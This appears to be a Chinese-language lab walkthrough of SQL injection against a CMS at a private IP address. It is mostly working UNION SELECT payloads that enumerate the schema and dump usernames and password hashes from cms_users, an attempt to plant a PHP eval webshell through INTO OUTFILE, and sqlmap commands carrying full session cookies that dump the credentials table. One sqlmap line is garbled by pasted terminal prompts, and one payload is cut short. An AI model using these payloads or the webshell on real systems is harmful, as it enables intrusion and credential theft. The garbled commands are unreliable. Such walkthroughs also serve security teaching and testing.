文章管理系统CMS的SQL Injection渗透测试

目录

判断注入类型：

判断所在数据库表的列数：

 判断表列的回显位置：

获取当前数据库及表信息：

收集后台系统信息：

进入后台：

SQLMAP注入演示：

判断注入类型：

 排除是字符型注入。

 确认注入类型是数值（数字）型。

判断所在数据库表的列数：

http://192.168.1.99:8085/show.php?id=32 order by 15

当order by 16的时候出现报错：

说明当前表有15列。

 判断表列的回显位置：

http://192.168.1.99:8085/show.php
?id=32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

 没有回显出来，前面改成一个不存在的id即可：

http://192.168.1.99:8085/show.php
?id=-32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,1

 回显位是3和11

获取当前数据库及表信息：

http://192.168.1.99:8085/show.php
?id=-32 union select 1,2,database(),4,5,6,7,8,9,10,version(),12,13,14,15

 http://192.168.1.99:8085/show.php?id=-32 union select 1,2,group_concat(table_name) ,4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema=database()

 http://192.168.1.99:8085/show.php?id=-32 union select 1,2,unhex(hex(group_concat(table_name))) ,4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema=database()

  http://192.168.1.99:8085/show.php?id=-32 union select 1,2,unhex(hex(group_concat(column_name))) ,4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.columns where table_name='cms_users'

   http://192.168.1.99:8085/show.php?id=-32 union select 1,2,username,4,5,6,7,8,9,10,password,12,13,14,15 from cms_users

或者：   

http://192.168.1.99:8085/show.php?id=-32 union select 1,2, group_concat(userid,':',username,':',password),4,5,6,7,8,9,10,database(),12,13,14,15 from cms_users

 此时拿到用户ID，用户名和密码的MD5，对应密码是123456

收集后台系统信息：

http://192.168.1.99:8085/show.php?id=-32 union select 1,2, @@version_compile_os,4,5,6,7,8,9,10,database(),12,13,14,15

进入后台：

 在“文件管理”测试发现绝对路径在报错后一闪而过，随抓包到绝对路径：

X:\phpstudy_pro\WWW\cms\admin\

构造SQL语句构造shell：

http://192.168.1.99:8085/show.php?id=-32 union select 1,2, "<?php @eval($_POST['c'])?>",4,5,6,7,8,9,10,database(),12,13,14,15 into outfile "X:\phpstudy_pro\WWW\cms\cmsSHELL.php"

这里由于在建站的时候强制使用的cms普通用户，没有权限写入webshell。

SQLMAP注入演示：

抓包拿到Cookie:

召唤sqlmap：

  sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D"

  sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0└─# sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhF└─# sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dbs

  sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --tables -D "cms"

  sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --columns -D "cms" -T "cms_users"

 sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dump -D "cms" -T "cms_users" -C "userid,username,password"